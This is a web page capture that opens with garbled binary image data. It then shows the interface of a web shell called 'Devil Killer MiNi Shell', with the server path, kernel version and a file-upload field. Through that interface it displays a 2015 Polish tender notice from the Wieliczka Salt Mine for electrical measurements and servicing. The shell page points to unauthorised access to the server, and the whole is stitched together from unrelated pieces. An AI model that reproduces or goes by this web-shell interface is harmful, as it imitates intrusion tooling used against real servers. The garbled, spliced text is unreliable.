JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150403/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150403/75506-N-2015.html

<p class="kh_header"><b>Wieliczka: Pomiary urządzeń elektroenergetycznych, przeglądy, konserwacje, serwis i prace przy usuwaniu awarii aparatury kontrolno-pomiarowej</b><br>
<b>Numer ogłoszenia: 75506 - 2015; data zamieszczenia: 03.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Kopalnia Soli "Wieliczka" Spółka Akcyjna , Park Kingi 1, 32-020 Wieliczka, woj. małopolskie, tel. 12 278711, 012 2787132, faks 02 2787110.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kopalniawieliczka.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Górnictwo Spółka Akcyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pomiary urządzeń elektroenergetycznych, przeglądy, konserwacje, serwis i prace przy usuwaniu awarii aparatury kontrolno-pomiarowej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Nazwa 
Pomiary urządzeń elektroenergetycznych, przeglądy, konserwacje, serwis i prace przy usuwaniu awarii aparatury kontrolno-pomiarowej
2.	Opis przedmiotu zamówienia

2.1.	Przedmiotem zamówienia jest świadczenie, przez Wykonawcę na rzecz Zamawiającego, usług polegających na wykonywaniu: 
1)	pomiarów elektroenergetycznych,
2)    wyznaczania trasy kabla elektrycznego oraz identyfikacji i lokalizacji miejsca uszkodzenia linii kablowej,
3)	konserwacji i przeglądów aparatury kontrolno - pomiarowej,
2.2.	Zamawiający zleci wykonanie usług określonych w pkt 2.1 ppkt 1 o wartości 70% ceny całkowitej brutto podanej w ofercie. Zlecenie wykonania pozostałej części usług o wartości 30% ceny całkowitej brutto podanej w ofercie będzie uzależnione od potrzeb Zamawiającego (prawo opcji).
3.	Szczegółowy opis przedmiotu zamówienia
3.1.	Pomiary elektroenergetyczne
Pomiary elektroenergetyczne będą wykonywane zgodnie z harmonogramem ustalonym przez Zamawiającego. Harmonogram ustalany jest rocznie na dany rok kalendarzowy, mając na uwadze obowiązujące w tym zakresie przepisy prawa oraz postanowienia dokumentacji techniczno-ruchowych urządzeń. Harmonogram wykonywania pomiarów elektroenergetycznych na 2015 rok stanowi załącznik nr 1 do specyfikacji.

Szczegółowy wykaz usług, miejsce świadczenia oraz ich ilości zawiera poniższa tabela A oraz B
A.
Lp.	Nazwa usługi	Miejsce świadczenia usługi	Maksymalna ilość pomiarów 
1	Pomiar rezystancji izolacji uzwojeń silnika o napięciu do 1 kV	podziemna część kopalni	300
		naziemna część kopalni	20
2	Pomiar rezystancji izolacji uzwojeń i rezystancji uzwojeń silnika o napięciu ponad 1 kV	podziemna część kopalni	34
		naziemna część kopalni	9
3	Pomiar rezystancji izolacji uzwojeń transformatora o mocy do 1.6 MVA	podziemna część kopalni	52
		naziemna część kopalni	20
4	Pomiar rezystancji izolacji uzwojeń transformatora o mocy powyżej 1,6 MVA 	naziemna część kopalni	3
5	Pomiar rezystancji izolacji dławika zwarciowego	naziemna część kopalni	2
6	Pomiar oscylograficzny podobciążeniowego przełącznika zaczepów	naziemna część kopalni	2
7	Pomiar zabezpieczenia upływowego RRgx, RRgZx, CUKI-05, PCB/M/3/220, UKI-24, itp. 	podziemna część kopalni	120
8	Pomiar wyłącznika niskonapięciowego typu BERGAMO, ISOL, NH, SH, S6N630, FK 800, MSL-200, WSCA, TS800N itp.	podziemna część kopalni	44
		naziemna część kopalni	2
9	Pomiary baterii akumulatorów stacyjnych i trakcyjnych	podziemna część kopalni	66
		naziemna część kopalni	34
10	Pomiary baterii akumulatorów stacyjnych - półroczny	podziemna część kopalni	52
		naziemna część kopalni	30
11	Pomiary okresowe spawarek wirowych i transformatorowych	naziemna część kopalni	24
12	Pomiary okresowe urządzeń elektrycznych przenośnych i ruchomych stosowanych w górnictwie	podziemna część kopalni	650
13	Pomiar okresowy wyłącznika mocy o napięciu znamionowym do 20 kV (rezystancja styków, czas niejednoczesności otwierania, rezystancja izolacji obwodów głównych i pomocniczych, sprawdzenie działania przyrządów pomiarowych)	naziemna i podziemna część kopalni	132
14	Pomiar wyzwalacza pierwotnego 1-fazowego WIP	naziemna i podziemna część kopalni	80
15	Pomiar wyzwalacza pierwotnego 1-fazowego WIPx	naziemna i podziemna część kopalni	9
16	Pomiar przekaźnika nadprądowo-termicznego 2-fazowego z członem zwarciowym typ PNW	podziemna część kopalni	7
17	Pomiar przekaźnika nadprądowo-termicznego 2-fazowego z członem zwarciowym RIzc-2, RSZt  itp. 	naziemna i podziemna część kopalni	9
18	Pomiar przekaźnika ziemnozwarciowego zerowo - prądowego RIg, RIgx, itp.	naziemna i podziemna część kopalni	3
19	Pomiar przekaźnika ziemnozwarciowego zerowo - mocowego UPZ-12M/B, ZSG itp.	naziemna i podziemna część kopalni	3
20	Pomiar zabezpieczenia termicznego 3-faz. silników n.n.	naziemna i podziemna część kopalni	28
21	Pomiary elektryczne okresowe suwnic 	naziemna część kopalni	4
22	Pomiary elektryczne okresowe windy osobowej	naziemna część kopalni	1
23	Pomiar baterii kondensatorów nn i SN	naziemna część kopalni	5
24	Pomiar rezystancji izolacji szyn głównych jednej sekcji rozdzielni SN	naziemna i podziemna część kopalni	9
25	Pomiar przekładnika prądowego do 20 kV	naziemna i podziemna część kopalni	176
26	Pomiar  przekładnika napięciowego do 20 kV	naziemna i podziemna część kopalni	110
27	Pomiar  przekładnika Ferrantiego	naziemna i podziemna część kopalni	32
28	Pomiar  przekładnika prądowego NN	naziemna i podziemna część kopalni	12
29	Pomiar cyfrowego zespołu zabezpieczeń  MultiMUZ, MegaMUZ, MiCOM itp. 	naziemna część kopalni	42
		podziemna część kopalni	14
30	Pomiar wyłącznika typu APU	naziemna część kopalni	7
31	Pomiar wyłączników różnicowo-prądowych	naziemna część kopalni	120
		podziemna część kopalni	2000
32	Pomiar rezystancji izolacji torów głównych urządzeń do 1 kV	naziemna i podziemna część kopalni	20
33	Sprawdzenie działania przyrządów pomiarowych	naziemna i podziemna część kopalni	44
34	Sprawdzenie mierników i wystawienie świadectwa wzorcowania/sprawdzenia	naziemna część kopalni	48
35	Pomiary okresowe elektronarzędzi	naziemna część kopalni	480
36	Pomiar przekaźnika napięciowego Repx-10	naziemna i podziemna część kopalni	40
37	Pomiar przekażnika kontroli temperatury transformatora 3/0,4kV o mocy do 1,6 MVA	naziemna i podziemna część kopalni	24
38	Pomiar przekaźnika upływowego typu PZ, KZ1, KZ2, K11, K12, ER100i itp. oraz  funkcjonalne sprawdzenie	podziemna część kopalni	900
39	Pomiar zabezpieczenia nadmiarowo - prądowego  Micom P211, OSC3, itp.	podziemna część kopalni	15
40	Pomiar przekaźnika kontroli ciągłości uziemienia UKU-24, MK4/Re itp	podziemna część kopalni	120
41	Pomiar przekaźnika kontroli izolacji  IR420 itp.	podziemna część kopalni	6
42	Pomiar przekaźnika temperaturowego typu 
TMA 100a itp.	podziemna część kopalni	4
43	Sprawdzenie miernika doziemienia MD-08, MKD itp. 	naziemna i podziemna część kopalni	20

B.
Lp.	Nazwa usługi	Miejsce świadczenia usługi	Maksymalna ilość pomiarów 
1	Pomiar skuteczności ochrony przeciwporażeniowej przed dotykiem pośrednim	naziemna część kopalni	240
		podziemna część kopalni	8000
2	Pomiar rezystancji izolacji instalacji elektrycznej - obwód 1-fazowy	naziemna część kopalni	150
		podziemna część kopalni	3000
3	Pomiar rezystancji izolacji instalacji elektrycznej - obwód 3-fazowy	naziemna część kopalni	100
		podziemna część kopalni	450
4	Pomiar instalacji odgromowej	naziemna część kopalni	60
5	Pomiar SUPO - pole metanowe	podziemna część kopalni	3000
6	Pomiar SUPO - pole niemetanowe	podziemna część kopalni	4500
7	Pomiar rezystancji izolacji kabli SN	naziemna i podziemna część kopalni	12
8	Próba napięciowa kabla SN	naziemna i podziemna część kopalni	7
9	Pomiar rezystancji uziemienia uziomu roboczego lub ochronnego urządzeń elektrycznych	naziemna i podziemna część kopalni	450
10	Pomiar rezystancji izolacji linii kablowej do 1 kV	naziemna i podziemna część kopalni	20
11	Pomiar prądów doziemnych sieci 3 kV	naziemna część kopalni	1
12	Pomiar napięć rażeniowych dotykowych na terenie i w sąsiedztwie stacji 15/3kV oraz rozdzielń 6kV i 3kV	naziemna  część kopalni	200

3.2.	Wyznaczenie trasy kabla elektrycznego oraz identyfikacja i lokalizacja miejsca 
	uszkodzenia linii kablowej	

Lp.	Nazwa usługi	Miejsce świadczenia usługi	Maksymalna ilość pomiarów
1	Wyznaczanie trasy kabla elektrycznego niskiego napięcia lub teletechnicznego	naziemna część kopalni	6
2	Identyfikacja i lokalizacja miejsca uszkodzenia linii kablowej niskiego napięcia	naziemna część kopalni	6
3	Wyznaczanie trasy kabla elektrycznego średniego napięcia	naziemna część kopalni	9
4	Identyfikacja i lokalizacja miejsca uszkodzenia linii kablowej średniego napięcia	naziemna część kopalni	9

3.2.1.	Zasady wykonywania usługi: - Usługa wykonywana będzie po przekazaniu zlecenia wykonania tych usług.
3.3.	Konserwacje i przeglądy, a także serwis i prace przy usuwaniu awarii aparatury kontrolno - pomiarowej określonej w dokumentacji techniczno-ruchowej poniższych urządzeń.
A.	Aparatura kontrolno-pomiarowa zlokalizowana jest w 17 obiektach. 
W tych obiektach znajduje się 27 przyrządów objętych przedmiotową usługą (ciepłomierze).	 
B.	Lokalizacja aparatury kontrolno-pomiarowej:
a)	następujące kotłownie:
-kotłownia parowa 2 x 0,5 MW
-kotłownia wodna niskotemperaturowa 2 x 0,35 MW
-kotłownia wysokotemperaturowa 2x 1,85 MW
-kotłownia wysokotemperaturowa 2 x 0,785 MW
-kotłownia niskotemperaturowa 2x 0,17MW
b)	sześć wymiennikowni ciepła
c)	stacja klimatyzacyjno-grzewcza



C.	Zakres usług.
Lp.	Nazwa usługi	Czas podejmowania usług	Maksymalna ilość usług
1.	Konserwacja i przegląd miesięczny jednego przyrządu aparatury kontrolno pomiarowej 
wraz z pisemnym raportem 
z wykonanej usługi	Raz w miesiącu	648

3.4	Dokumentacja techniczno-ruchowa instalacji, gdzie zlokalizowana jest aparatura kontrolno-pomiarowa, stanowi załącznik nr 2 do specyfikacji..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.73.00.00-4, 50.41.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Wadium w wysokości: 20 000,00 zł należy wnieść przed upływem terminu składania ofert, określonym w części XIII pkt 2 specyfikacji.
2.Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy:
Bank Pekao Spółka Akcyjna Oddział w Wieliczce
Konto: 75124047481111000048778501 
z dopiskiem: wadium w sprawie KSW/2015/EL/8
Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego.
Nie dopuszcza się wpłaty wadium w kasie Kopalni Soli Wieliczka S.A.
3.Wadium wniesione w innej formie niż forma pieniężna (zgodnie z przepisami ustawy Prawo zamówień publicznych) winno być złożone w Sekretariacie Kopalni Soli Wieliczka S.A. przed upływem terminu składania ofert określonym w części XIII pkt 2 specyfikacji.
4.Zamawiający dokona zwrotu wadium zgodnie z art. 46 ustawy Prawo zamówień publicznych.
5.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, co powodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej.
6.Zgodnie z art. 46 ust 5 ustawy Pzp, Zamawiający zatrzymuje wadium wraz  z odsetkami, jeżeli Wykonawca, którego oferta została wybrana :
1)odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
2)nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
3)zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe  z przyczyn leżących po stronie Wykonawcy.
7.Wykonawca, który nie wniesie wymaganego wadium do upływu terminu składania ofert, na przedłużony okres związania ofertą lub w terminie, o którym mowa w art. 46 ust. 3 ustawy Prawo zamówień publicznych albo nie zgodzi się na przedłużenie okresu związania ofertą zostanie wykluczony z postępowania o udzielenie zamówienia publicznego na podstawie art. 24 ust. 2 pkt 2 ustawy Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>A. Pomiary elektroenergetyczne: 
-udokumentowanie, że realizacja przedmiotu zamówienia nastąpi pod kierownictwem osoby posiadającej kwalifikacje uprawniające do pełnienia, w podziemnej części Zakładu Górniczego Kopalni Soli Wieliczka, funkcji osoby posiadającej co najmniej uprawnienia dozoru średniego ruchu elektrycznego,
-udokumentowanie, że wykonywanie robót w zakresie elektrycznym nastąpi pod kierownictwem osoby posiadające kwalifikacje uprawniające ich do pracy na stanowisku dozoru odpowiednio w zakresie co najmniej kontrolno-pomiarowym urządzeń, instalacji i sieci elektroenergetycznych wytwarzających, przetwarzających, przesyłających i zużywających energię elektryczną do 15 kV,
-udokumentowanie, że wykonywanie robót w zakresie elektrycznym nastąpi przez osoby posiadające kwalifikacje uprawniające ich do pracy na stanowisku eksploatacji odpowiednio w zakresie co najmniej kontrolno-pomiarowym urządzeń, instalacji i sieci elektroenergetycznych wytwarzających, przetwarzających, przesyłających i zużywających energię elektryczną do 15 kV,
-udokumentowanie, że realizacja przedmiotu zamówienia nastąpi przez osoby posiadającej kwalifikacje uprawniające, w podziemnej części Zakładu Górniczego Kopalni Soli Wieliczka, do pracy na stanowisku elektromonter sprzętu elektrycznego o napięciu powyżej 1 kV wraz z ważnymi badaniami psychofizycznymi, 
-udokumentowanie, że realizacja przedmiotu zamówienia, przez osoby dozoru ruchu posiadające kwalifikacje w postaci odbycia przeszkolenia osoby dozoru z zakresu ratownictwa górniczego osób kierownictwa 
i dozoru ruchu zakładu górniczego nie wchodzących w skład drużyny ratowniczej.
B. Wyznaczanie trasy kabla elektrycznego oraz identyfikacja i lokalizacja miejsca uszkodzenia linii kablowej:
-udokumentowanie, że wykonywanie robót w zakresie elektrycznym nastąpi przez osoby posiadające kwalifikacje uprawniające ich do pracy na stanowisku eksploatacji odpowiednio w zakresie co najmniej kontrolno-pomiarowym urządzeń, instalacji i sieci elektroenergetycznych wytwarzających, przetwarzających, przesyłających i zużywających energię elektryczną do 15 kV,
C. Konserwacje i przeglądy aparatury kontrolno-pomiarowej:
- Udokumentowanie, że wykonywanie robót nastąpi przez osoby posiadające kwalifikacje uprawniające ich do pracy na stanowisku eksploatacji w zakresie obsługi, konserwacji, remontów i kontrolno-pomiarowym dla następujących urządzeń instalacji i sieci: 
-kotły parowe oraz wodne na paliwa stałe, płynne i gazowe, o mocy powyżej 50 kW, wraz z urządzeniami pomocniczymi;
-sieci i instalacje cieplne wraz z urządzeniami pomocniczymi, o przesyle ciepła powyżej 50 kW;
-przemysłowe urządzenia odbiorcze pary i gorącej wody, o mocy powyżej 50 kW;
-urządzenia wentylacji, klimatyzacji i chłodnicze, o mocy powyżej 50 kW;
-pompy, ssawy, wentylatory i dmuchawy, o mocy powyżej 50 kW;
-aparatura kontrolno-pomiarowa i urządzenia automatycznej regulacji do urządzeń i instalacji wymienionych powyżej
-Udokumentowanie, że wykonywanie robót nastąpi przez osoby posiadające kwalifikacje uprawniające ich do pracy na stanowisku dozoru w zakresie obsługi, konserwacji, remontów i kontrolno-pomiarowym dla następujących urządzeń instalacji i sieci: 
-kotły parowe oraz wodne na paliwa stałe, płynne i gazowe, o mocy powyżej 50 kW, wraz z urządzeniami pomocniczymi;
-sieci i instalacje cieplne wraz z urządzeniami pomocniczymi, o przesyle ciepła powyżej 50 kW;
-przemysłowe urządzenia odbiorcze pary i gorącej wody, o mocy powyżej 50 kW;
-urządzenia wentylacji, klimatyzacji i chłodnicze, o mocy powyżej 50 kW;
-pompy, ssawy, wentylatory i dmuchawy, o mocy powyżej 50 kW;
-aparatura kontrolno-pomiarowa i urządzenia automatycznej regulacji do urządzeń i instalacji wymienionych powyżej

D. udokumentowania, iż  w skład zespołu osób wykonujących przedmiot zamówienia będzie wchodziła osoba posiadająca znajomość wyrobisk podziemnych  Zakładu Górniczego Kopalni Soli Wieliczka</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, to jest posiadanie przez Wykonawcę ubezpieczenia od odpowiedzialności cywilnej, 
w zakresie prowadzonej działalności gospodarczej w wysokości co najmniej 
100 000,00 zł (polisa a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - Czas podjęcia wykonania realizacji usługi od chwili zgłoszenia - 2</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zgodnie z przepisem art. 144 ust. 1 ustawy Prawo zamówień publicznych, dopuszcza się możliwość dokonania istotnych zmian postanowień umowy, w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w zakresie o którym mowa w ust. 2, 
